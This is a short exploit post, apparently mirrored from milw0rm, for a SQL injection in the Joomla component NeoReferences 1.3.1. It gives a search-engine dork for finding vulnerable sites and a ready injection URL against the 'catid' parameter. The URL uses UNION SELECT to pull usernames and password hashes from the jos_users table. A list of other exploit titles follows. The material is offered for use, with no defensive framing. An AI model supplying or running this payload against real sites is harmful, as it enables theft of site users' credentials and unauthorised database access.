Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln

http://milw0rm.com/exploits/5034

########################################################################### joomla SQL Injection(com_neoreferences)############################################################################ AUTHOR : S@BUN## HOME : http://www.hackturkiye.com/########################################################################### DorKs 1 : allinurl: "com_neoreferences"#########################################################################EXPLOIT :index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*########################################################################## S@BUN www.hackturkiye.com S@BUN########################################################################## S@BUN GOOD LUCKY S@BUN#########################################################################added notes: NeoReferences December 2006 NeoJoomla Released under CREATIVE COMMONS License Copyright (C) 2006 Neoweb support@neojoomla.com www.neojoomla.com 1.3.1 Developped by NeoJoomla.]]># milw0rm.com [2008-02-01]

» Joomla Component com_facileforms 1.4.4 RFI Vulnerability
» ResearchGuide 0.5 (guide.php id) SQL Injection Vulnerability
» Agares PhpAutoVideo 2.21 (articlecat) SQL Injection Vulnerability
» phpBB Mod FileBase (id) Remote SQL Injection Vulnerability
» Site Sift scripts SQL Injection

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.

Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln